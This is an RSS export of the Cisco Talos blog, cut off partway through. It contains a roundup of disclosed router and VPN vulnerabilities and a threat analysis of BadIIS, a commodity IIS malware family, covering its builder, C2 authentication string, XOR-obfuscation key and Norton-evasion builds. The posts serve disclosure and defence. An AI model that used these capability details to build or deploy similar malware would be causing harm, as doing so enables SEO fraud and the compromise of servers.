<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Cisco Talos Blog]]></title><description><![CDATA[Talos intelligence and world-class threat research team better protects you and your organization against known and emerging cybersecurity threats.]]></description><link>https://blog.talosintelligence.com/</link><image><url>https://blog.talosintelligence.com/favicon.png</url><title>Cisco Talos Blog</title><link>https://blog.talosintelligence.com/</link></image><generator>Ghost 6.39</generator><lastBuildDate>Tue, 19 May 2026 15:39:44 GMT</lastBuildDate><atom:link href="https://blog.talosintelligence.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[TP-Link, Photoshop, OpenVPN, Norton VPN vulnerabilities]]></title><description><![CDATA[<p>Cisco Talos&#x2019; Vulnerability Discovery &amp; Research team recently disclosed eight vulnerabilities in TP-Link, and one each in Adobe Photoshop, OpenVPN, and Gen Digital&apos;s Norton VPN.</p><p>The vulnerabilities mentioned in this blog post have been patched by their respective vendors, in adherence to<a href="https://sec.cloudapps.cisco.com/security/center/resources/vendor_vulnerability_policy.html"><u> Cisco&#x2019;s third-party vulnerability</u></a></p>]]></description><link>https://blog.talosintelligence.com/tp-link-photoshop-openvpn-norton-vpn-vulnerabilities/</link><guid isPermaLink="false">6a0378822f19850001e5d947</guid><category><![CDATA[Vulnerability Roundup]]></category><dc:creator><![CDATA[Kri Dontje]]></dc:creator><pubDate>Tue, 19 May 2026 15:39:37 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/vuln_roundup.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/vuln_roundup.jpg" alt="TP-Link, Photoshop, OpenVPN, Norton VPN vulnerabilities"><p>Cisco Talos&#x2019; Vulnerability Discovery &amp; Research team recently disclosed eight vulnerabilities in TP-Link, and one each in Adobe Photoshop, OpenVPN, and Gen Digital&apos;s Norton VPN.</p><p>The vulnerabilities mentioned in this blog post have been patched by their respective vendors, in adherence to<a href="https://sec.cloudapps.cisco.com/security/center/resources/vendor_vulnerability_policy.html"><u> Cisco&#x2019;s third-party vulnerability disclosure policy</u></a>, except the Norton VPN vulnerability, which was discovered in-use before a patch was available.&#xA0;</p><p>For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from<a href="https://snort.org/"><u> Snort.org</u></a>, and our latest Vulnerability Advisories are always posted on<a href="https://talosintelligence.com/vulnerability_reports"><u> Talos Intelligence&#x2019;s website</u></a>.</p><h2 id="tp-link-vulnerabilities"><strong>TP-Link vulnerabilities</strong></h2><p><em>Discovered by Lilith &gt;_&gt; of Cisco Talos.</em></p><p>The TP-Link Archer AX53 is a dual band gigabit Wi-Fi router. Talos has disclosed eight vulnerabilities, as follows:</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2302"><u>TALOS-2025-2302</u></a> (CVE-2026-30814) is a stack-based buffer overflow vulnerability in the tmpServer opcode 0x436 functionality of Tp-Link AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted set of network packets can lead to arbitrary code execution. An attacker can send packets to trigger this vulnerability.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2303"><u>TALOS-2025-2303</u></a> (CVE-2026-30815) is an OS command injection vulnerability in the OpenVPN configuration restore script_security functionality of Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted configuration value can lead to arbitrary command execution. An attacker can upload a malicious file to trigger this vulnerability.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2304"><u>TALOS-2025-2304</u></a> (CVE-2026-30816) is an external config control vulnerability in the OpenVPN configuration restore crt.sed functionality of Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted configuration value can lead to arbitrary file reading. An attacker can upload a malicious file to trigger this vulnerability.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2305"><u>TALOS-2025-2305</u></a> (CVE-2026-30817) is an external config control vulnerability in the OpenVPN configuration restore route_up functionality of Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted configuration value can lead to arbitrary file reading. An attacker can upload a malicious file to trigger this vulnerability.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2306"><u>TALOS-2025-2306</u></a> (CVE-2026-30818) is an OS command injection vulnerability exists in the dnsmasq configuration restore dhcpscript functionality of Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted configuration value can lead to arbitrary command execution. An attacker can upload a malicious file to trigger this vulnerability.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2307"><u>TALOS-2025-2307</u></a>,<a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2308"> <u>TALOS-2025-2308</u></a>, and<a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2309"> <u>TALOS-2025-2309</u></a> are OS command injection vulnerabilities in the OpenVPN configuration restore client_disconnect, client_connect, and route_up functionalities of Tp-Link Archer AX53 v1.0 1.3.1 Build 20241120 rel.54901(5553). A specially crafted configuration value can lead to arbitrary command execution. An attacker can upload a malicious file to trigger this vulnerability.</p><h2 id="photoshop-vulnerabilities"><strong>Photoshop vulnerabilities</strong></h2><p><em>Discovered by KPC of Cisco Talos.</em></p><p>Adobe Photoshop is a popular digital photo manipulation and illustration program with a wide array of features for personal and business use cases.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2274"><u>TALOS-2025-2274</u></a> (CVE-2026-34632) is a privilege escalation vulnerability in the installation process of Adobe Photoshop via the Microsoft Store. The vulnerable version of the installer is Photoshop_Set-Up.exe 2.11.0.30. A low-privilege user can replace files during the installation process, which may result in elevation of privileges.</p><h2 id="openvpn-vulnerabilities"><strong>OpenVPN vulnerabilities</strong></h2><p><em>Discovered by Emma Reuter of Cisco ASIG.</em></p><p>OpenVPN is an open source SSL VPN with remote access, site-to-site VPNs, WiFi security, enterprise load balancing, failover, and granular access control features available.</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2026-2381"><u>TALOS-2026-2381</u></a> (CVE-2026-35058) is a reachable assertion vulnerability in the TLS Crypt v2 Client Key Extraction functionality of OpenVPN 2.6.x and 2.8_git. A specially crafted network packet can lead to a denial of service. An attacker can send a sequence of malicious packets to trigger this vulnerability.</p><h2 id="gen-digital-norton-vpn-vulnerabilities"><strong>Gen Digital Norton VPN vulnerabilities</strong></h2><p><em>Discovered by KPC of Cisco Talos.</em></p><p>Gen Digital&apos;s Norton VPN client is a proprietary tool for private proxy network information exchange.&#xA0;</p><p><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2025-2276"><u>TALOS-2025-2276</u></a> (CVE-2025-58074) is a privilege escalation vulnerability in the installation process of Norton VPN via the Microsoft Store. A low-privilege user can replace files during the installation process, which may result in deletion of arbitrary files, possibly leading to elevation of privileges.</p>]]></content:encoded></item><item><title><![CDATA[From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat]]></title><description><![CDATA[Cisco Talos has uncovered a BadIIS variant — identifiable by its embedded "demo.pdb" strings — that functions as commodity malware, likely sold or shared among multiple Chinese-speaking cyber crime groups operating under a malware-as-a-service (MaaS) model for continuous monetization.]]></description><link>https://blog.talosintelligence.com/from-pdb-strings-to-maas-tracking-a-commodity-badiis-ecosystem/</link><guid isPermaLink="false">6a0b4cf8f7534500018a7e5e</guid><category><![CDATA[Threat Spotlight]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><category><![CDATA[Cisco Talos Web Filtering]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><dc:creator><![CDATA[Joey Chen]]></dc:creator><pubDate>Tue, 19 May 2026 10:00:20 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Badlls-03.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco Talos has uncovered a BadIIS variant &#x2014; identifiable by its embedded &quot;demo.pdb&quot; strings &#x2014; that functions as commodity malware. This variant is likely sold or shared among multiple Chinese-speaking cybercrime groups that operate under a&#xA0;<a href="https://blog.talosintelligence.com/need-to-know-commodity-malware/" rel="noreferrer noopener"><u>malware-as-a-service (MaaS)</u></a>&#xA0;model for continuous monetization.&#xA0;</li><li>Analysis of&#xA0;program database (PDB)&#xA0;file&#xA0;paths reveals a sustained, multi-year development effort by an author&#xA0;operating&#xA0;under the alias &#x201C;lwxat&#x201D;,&#xA0;spanning from at least September 2021 through January 2026, with evidence of rapid iterative updates, feature branching, and reactive evasion tactics targeting specific security vendors such as Norton.</li><li>Talos recovered a dedicated builder tool that allows threat actors to generate configuration files, customize payloads, and inject parameters into&#xA0;BadIIS&#xA0;binaries&#xA0;&#x2014;&#xA0;enabling capabilities including traffic redirection to illicit sites, reverse proxying for search engine crawler manipulation, content hijacking, and backlink injection for&#xA0;malicious&#xA0;search engine optimization (SEO)&#xA0;fraud.&#xA0;</li><li>Beyond&#xA0;BadIIS, the same author has developed a suite of auxiliary tools&#xA0;&#x2014;&#xA0;including service-based installers, droppers, and persistence mechanisms that automate deployment, ensure survivability across IIS server restarts, and evade detection through custom Base64 encoding and obfuscation techniques.</li></ul><hr><h2 id="mystery-badiis-containing-%E2%80%9Cdemopdb%E2%80%9D">Mystery&#xA0;BadIIS&#xA0;containing&#xA0;&#x201C;demo.pdb&#x201D;&#xA0;</h2><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Badlls-03.jpg" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat"><p>Since 2024, Talos has investigated&#xA0;numerous&#xA0;attacks across the Asia-Pacific region&#xA0;(along with a few in South Africa,&#xA0;Europe&#xA0;and North America)&#xA0;that&#xA0;utilize&#xA0;a specific variant of&#xA0;BadIIS&#xA0;characterized by &quot;demo.pdb&quot; strings. While multiple security vendors are tracking the global spread of these variants,&#xA0;Talos&apos;&#xA0;observed&#xA0;tactics, techniques, and procedures (TTPs)&#xA0;show notable divergences from those documented by other vendors like&#xA0;<a href="https://www.trendmicro.com/en_us/research/25/b/chinese-speaking-group-manipulates-seo-with-badiis.html" rel="noreferrer">Trend Micro</a>,&#xA0;<a href="https://asec.ahnlab.com/jp/65289/" rel="noreferrer">Ahnlab</a>, VNPT,&#xA0;and&#xA0;<a href="https://www.elastic.co/security-labs/badiis-to-the-bone-new-insights-to-global-seo-poisoning-campaign" rel="noreferrer">Elastic</a>. Consequently, it is difficult to attribute these attacks to a single threat actor. However, we assess with&#xA0;moderate&#xA0;confidence that the &quot;demo.pdb&quot;&#xA0;BadIIS&#xA0;variant is a commodity tool&#xA0;utilized&#xA0;by multiple Chinese-speaking cybercrime groups.&#xA0;</p><h2 id="insights-from-embedded-pdb-strings">Insights from embedded PDB strings&#xA0;</h2><p>Although the core functionality of this&#xA0;BadIIS&#xA0;variant is&#xA0;largely limited&#xA0;to SEO fraud, content injection, and proxy&#x2011;based traffic manipulation, our investigation pivoted toward the&#xA0;malware&#x2019;s&#xA0;embedded PDB strings.&#xA0;The consistent PDB path pattern offers much more intelligence value than the generic&#xA0;&#x201C;demo.pdb&#x201D;&#xA0;filename. The combination of a stable &#x201C;Administrator\Desktop&#x201D; build environment, Chinese-language folder names, and date-based versioning creates&#xA0;a highly reliable&#xA0;fingerprint for tracking and clustering this&#xA0;BadIIS&#xA0;version toolset.&#xA0;Beyond reinforcing our assessment that this is a commodity&#xA0;IIS malware family, the PDB paths enabled attribution to a&#xA0;possible customer&#xA0;name alias &#x201C;x&#x795E;&#x201D; (&#x201C;xshen&#x201D;). Furthermore, the PDB artifacts reveal the&#xA0;existence&#xA0;of customized builds, some explicitly tailored to:</p><ul><li>Bypass specific antivirus products,&#xA0;such as&#xA0;Norton&#xA0;</li><li>Perform site&#x2011;wide hijacking&#xA0;</li><li>Redirect users conditionally based on browser language or environment</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig1.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="665" height="68" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig1.png 665w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;1.&#xA0;&#x201C;Custom site hijacking:&#xA0;redirect&#xA0;based on browser language&#x201D;&#xA0;version.</span></figcaption></figure><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig2-1.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="637" height="68" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig2-1.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig2-1.png 637w"></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig2-2.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="624" height="98" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/fig2-2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig2-2.png 624w"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;2.&#xA0;PDB with&#xA0;&#x8FC7;&#x8BFA;&#x987F; (bypass Norton antivirus)&#xA0;version.</span></figcaption></figure><p>Prompted by these&#xA0;initial&#xA0;discoveries,&#xA0;Talos&#xA0;expanded our&#xA0;threat&#xA0;hunting efforts to&#xA0;identify&#xA0;similar PDB strings associated with this author with high confidence. The PDB paths extracted from these&#xA0;BadIIS&#xA0;variants reveal a sustained, multi-year development effort spanning from at least September 2021 to January 2026. By analyzing the developer&apos;s folder naming conventions, we can accurately map the&#xA0;malware&apos;s&#xA0;evolutionary trajectory, feature branching, and commercialization model.</p><h3 id="timeline-and-iterative-maintenance">Timeline and iterative maintenance&#xA0;</h3><p>Talos observed that the earliest explicit timestamp in the PDB paths is&#xA0;Sept. 30,&#xA0;2021,&#xA0;indicating&#xA0;that the development of this specific toolset began on or before this date. The naming conventions observed in folders such as&#xA0;&#x201C;dll0217&#x201D;,&#xA0;&#x201C;dll0301&#x201D;, and &#x201C;dll0315&#x201D; (likely&#xA0;representing&#xA0;February 17, March 1, and March 15)&#xA0;demonstrate&#xA0;periods of rapid, sprint-like updates. Additionally, the&#xA0;&#x201C;dll-no503&#x201D;&#xA0;directory is particularly notable; it&#xA0;likely represents&#xA0;a troubleshooting build designed to resolve an issue where the malware caused IIS to throw &quot;503 Service Unavailable&quot; errors, which would otherwise alert server administrators to the infection. Finally, the latest observed compilation date,&#xA0;&#x201C;dll20260106&#x201D;&#xA0;(Jan.&#xA0;6, 2026), confirms that this toolset remains actively maintained and deployed in the wild as of early 2026.</p><h3 id="feature-branching-and-evasion-tactics">Feature branching and evasion tactics&#xA0;</h3><p>Talos&#xA0;also&#xA0;observed&#xA0;that the folder&#xA0;&#x201C;&#x517C;&#x5BB9;&#x767E;&#x5EA6;&#x6D4F;&#x89C8;&#x5668;+&#x52AB;&#x6301;robots.txt&#x201D;&#xA0;(&#x201C;Compatible with Baidu&#xA0;browser + hijacking robots.txt&#x201D;) explicitly confirms the malware&apos;s role in&#xA0;malicious&#xA0;SEO&#xA0;campaigns, specifically targeting the Chinese search engine ecosystem. Furthermore, the&#xA0;&#x201C;2024-05-05-tcp&quot;&#xA0;branch indicates a shift or enhancement in how the malware handles network traffic, potentially introducing custom proxying or SEO fraud communication protocols over raw TCP. Additionally, the inclusion of&#xA0;&#x201C;&#x8FC7;&#x8BFA;&#x987F;&#x201D;&#xA0;(&#x201D;bypass&#xA0;Norton&#x201D;) in the build paths highlights a reactive development cycle, demonstrating that the author actively modifies the code to evade specific security vendor detections.</p><p>Below are the PDB strings&#xA0;Talos&#xA0;collected:</p><ul><li>C:\Users\Administrator\Desktop\2021-09-30\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\iis\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll0217\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll0217\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll0301\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll0301\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll0315\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll0315\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll-no503\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll-no503\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\&#x517C;&#x5BB9;&#x767E;&#x5EA6;&#x6D4F;&#x89C8;&#x5668;+&#x52AB;&#x6301;robots.txt\x64\Release\demo.pdb&#xA0;&#xA0;<br>(<em>translation:</em>&#xA0;<em>&#x201C;compatible</em>&#xA0;<em>with Baidu</em>&#xA0;<em>browser + hijacking robots.txt&#x201D;</em>)&#xA0;</li><li>C:\Users\Administrator\Desktop\2023-10-10\dll\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\2023-10-10\dll\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\2023-11-02\dll\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\2023-11-02\dll\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\2024-05-05-tcp\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\2024-05-05-tcp\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\J3\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll(cur)\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll(cur)\x64\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\2024-05-05-tcp(&#x8FC7;&#x8BFA;&#x987F;)xshen\Release\demo.pdb&#xA0;&#xA0;<br>(<em>translation:</em>&#xA0;<em>&#x201C;bypass</em>&#xA0;<em>Norton&#x201D;</em>)&#xA0;</li><li>C:\Users\Administrator\Desktop\2024-05-05-tcp(&#x8FC7;&#x8BFA;&#x987F;)xshen\x64\Release\demo.pdb&#xA0;&#xA0;<br>(<em>translation:</em>&#xA0;<em>&#x201C;bypass</em>&#xA0;<em>Norton&#x201D;</em>)&#xA0;</li><li>C:\Users\Administrator\Desktop\2025-11-21 (x&#x795E;&#x8BA2;&#x5236;&#x5168;&#x7AD9;&#x52AB;&#x6301;&#x6309;&#x6D4F;&#x89C8;&#x5668;&#x8BED;&#x8A00;&#x8DF3;&#x8F6C;)\dll\Release\demo.pdb&#xA0;&#xA0;<br>(<em>translation:</em>&#xA0;<em>&#x201C;xshen</em>&#xA0;<em>custom site hijacking:</em>&#xA0;<em>redirect based on browser language</em>)&#x201D;&#xA0;</li><li>C:\Users\Administrator\Desktop\2025-11-21 (x&#x795E;&#x8BA2;&#x5236;&#x5168;&#x7AD9;&#x52AB;&#x6301;&#x6309;&#x6D4F;&#x89C8;&#x5668;&#x8BED;&#x8A00;&#x8DF3;&#x8F6C;)\dll\x64\Release\demo.pdb&#xA0;&#xA0;<br>(<em>translation:</em>&#xA0;<em>&#x201C;xshen</em>&#xA0;<em>custom site hijacking:</em>&#xA0;<em>redirect based on browser language&#x201D;</em>)&#xA0;</li><li>C:\Users\Administrator\Desktop\dll20260106\Release\demo.pdb&#xA0;</li><li>C:\Users\Administrator\Desktop\dll20260106\x64\Release\demo.pdb</li></ul><h2 id="builder-architecture-and-badiis-generation">Builder architecture and&#xA0;BadIIS&#xA0;generation&#xA0;</h2><p>During our&#xA0;research into these&#xA0;BadIIS&#xA0;campaigns, Talos&#xA0;discovered a builder tool specifically designed for this malware variant. The threat actor&#xA0;utilizes&#xA0;this utility to generate configuration files, JavaScript redirectors,&#xA0;and PHP backlink scripts, as well as to inject custom parameters directly into the&#xA0;BadIIS&#xA0;malware.&#xA0;Figure 3 shows a&#xA0;screenshot of the&#xA0;builder&apos;s&#xA0;interface.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig3.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="568" height="892"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;3.&#xA0;Builder screenshot.</span></figcaption></figure><p>The observed builder is labeled as&#xA0;&#x201C;version 1.0,&#x201D;&#xA0;with an estimated original release year of 2021. However, the application header and compilation timestamp&#xA0;indicate&#xA0;that this specific artifact is an updated build compiled on August 22, 2022. The interface fields and configurable settings perfectly align with known&#xA0;BadIIS&#xA0;capabilities, which can be categorized into four primary functions:&#xA0;</p><ul><li><strong>Traffic</strong>&#xA0;<strong>redirection:</strong>&#xA0;The builder allows threat actors to input target URLs, typically JavaScript-based redirectors, designed to be injected into the victim&apos;s browser. This feature forcibly redirects legitimate user traffic to spam infrastructure, such as illegal gambling, adult content, or other malicious websites.&#xA0;</li><li><strong>Reverse&#xA0;proxy:</strong>&#xA0;This feature manipulates how the compromised server interacts with search engine crawlers. When a crawler visits specific hidden URLs, the&#xA0;BadIIS&#xA0;malware acts as a reverse proxy, silently fetching illicit content from the threat actor&apos;s command-and-control (C2)&#xA0;backend and serving it to the crawler for indexing. Furthermore, the builder includes a toggle to enable this reverse proxy behavior globally, intercepting crawlers even if they do not visit the designated hidden URLs.</li><li><strong>Content</strong>&#xA0;<strong>hijacking:</strong>&#xA0;The builder includes a site hijacking function capable of replacing the compromised website&apos;s original content for both normal users and search engine crawlers. Threat actors can configure the hijacking rate (percentage of traffic affected), toggle whether the homepage is explicitly targeted, and supply a remote URL to dynamically fetch malicious&#xA0;title,&#xA0;description, and&#xA0;keyword (TDK) metadata.&#xA0;</li><li><strong>Internal</strong>&#xA0;<strong>and</strong>&#xA0;<strong>backlinks setting:</strong>&#xA0;The final&#xA0;component&#xA0;configures the injection of internal links and external backlinks. Internal links force search engines to discover and index the spam pages hosted directly on the compromised server. Meanwhile, external backlinks siphon the compromised&#xA0;server&apos;s&#xA0;Domain Authority, passing that high reputation onto external illicit websites to artificially inflate their search engine rankings.</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/041326-Badlls-01.jpg" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="2000" height="1109" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/041326-Badlls-01.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/041326-Badlls-01.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/041326-Badlls-01.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/041326-Badlls-01.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;4.&#xA0;Builder workflow.</span></figcaption></figure><p>Furthermore,&#xA0;operating&#xA0;this builder is not a simple, single-click process. Prior to generating the final payloads, the threat actor must stage unconfigured 32-bit and 64-bit&#xA0;BadIIS&#xA0;binaries within the same directory as the builder. Upon&#xA0;initiating&#xA0;the build process, the builder generates a&#xA0;&#x201C;config.txt&#x201D;&#xA0;file based on the threat actor&#x2019;s configured parameters.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig5.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="456" height="356"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;5.&#xA0;Configured parameters.&#xA0;</span></figcaption></figure><p>It then&#xA0;attempts&#xA0;to authenticate with the C2 server by&#xA0;checking for&#xA0;the specific response string &quot;lwxat&quot;. Although the builder does not enforce this&#xA0;validation&#xA0;step&#xA0;&#x2014;&#xA0;continuing the payload generation process regardless of whether the authentication succeeds or fails&#xA0;&#x2014;&#xA0;this&#xA0;specific network behavior is highly valuable. Notably, this unique authentication mechanism serves as a critical pivot point, enabling us to&#xA0;identify&#xA0;and attribute other tools developed by the same author.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig6.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="591" height="656"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;6.&#xA0;Unique authentication mechanism.</span></figcaption></figure><p>The final step of the build process involves obfuscating the C2 server address using a single-byte XOR operation with the key 0x3. Once encoded, the builder embeds these addresses, along with all other configured parameters, directly into the final BadIIS malware under the output folder. This configured and output files are illustrated in Figure 7.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig7.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="551" height="511"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;7.&#xA0;Configuration embedded&#xA0;in&#xA0;a&#xA0;BadIIS&#xA0;sample.&#xA0;</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/fig8.png" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="420" height="698"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;8.&#xA0;BadIIS&#xA0;output&#xA0;files and its original name.</span></figcaption></figure><h3 id="advancement-of-the-builder-architecture">Advancement of the&#xA0;builder&#xA0;architecture&#xA0;</h3><p>Talos&#xA0;has&#xA0;been tracking multiple cybercrime&#xA0;groups,&#xA0;including&#xA0;those detailed in our&#xA0;previous&#xA0;reports on&#xA0;<a href="https://blog.talosintelligence.com/dragon-rank-seo-poisoning/" rel="noreferrer noopener"><u>DragonRank</u></a>&#xA0;and&#xA0;<a href="https://blog.talosintelligence.com/uat-8099-chinese-speaking-cybercrime-group-seo-fraud/" rel="noreferrer noopener"><u>UAT-8099</u></a>,&#xA0;that&#xA0;utilize&#xA0;various&#xA0;BadIIS&#xA0;variants to turn global web servers into compromised assets for search engine manipulation. The&#xA0;BadIIS&#xA0;variants deployed by those two groups primarily relied on hardcoded C2 infrastructure and statically compiled payloads to spread. However, the variant characterized by the &quot;demo.pdb&quot; strings&#xA0;represents&#xA0;a significant departure from these&#xA0;previous&#xA0;iterations.</p><p>Based on the&#xA0;recovered builder and PDB strings, Talos assesses with&#xA0;moderate&#xA0;confidence that this &quot;demo.pdb&quot; variant is commodity malware,&#xA0;likely sold&#xA0;privately or shared within underground&#xA0;markets. The architecture of this toolset suggests a modular,&#xA0;MaaS&#xA0;business model designed for continuous monetization. The malware developer can initially sell a basic version of&#xA0;BadIIS&#xA0;alongside the builder tool. If a threat actor later&#xA0;requiresan advanced, updated, or customized version (such as the&#xA0;&#x201C;Norton bypass&#x201D;&#xA0;or&#xA0;&#x201C;custom site hijacking:&#xA0;redirect based on browser language&#x201D;&#xA0;modules), they can request a bespoke payload from the developer and use their existing builder to inject the necessary configurations.&#xA0;Figure 9 shows&#xA0;the workflow&#xA0;Talos&#xA0;assessed.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/041326-Badlls-03.jpg" class="kg-image" alt="From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat" loading="lazy" width="2000" height="1269" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/041326-Badlls-03.jpg 600w, 